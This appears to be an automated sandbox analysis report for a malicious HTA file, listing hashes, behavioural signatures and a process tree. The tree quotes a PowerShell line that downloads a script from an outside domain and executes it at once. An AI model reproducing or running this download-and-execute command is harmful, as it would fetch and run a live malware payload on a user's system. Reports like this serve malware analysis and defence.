Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
08-04-2024 07:46
Static task
static1
Behavioral task
behavioral1
Sample
wtf.hta
Resource
win7-20231129-en
windows7-x64
5 signatures
300 seconds
General
-
Target
wtf.hta
-
Size
46KB
-
MD5
5fbdd6357b961e941acd3c06ba2e867e
-
SHA1
ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
-
SHA256
f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
-
SHA512
c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
-
SSDEEP
768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2764 860 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2764 powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wtf.hta"1⤵
- Modifies Internet Explorer settings
PID:3040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764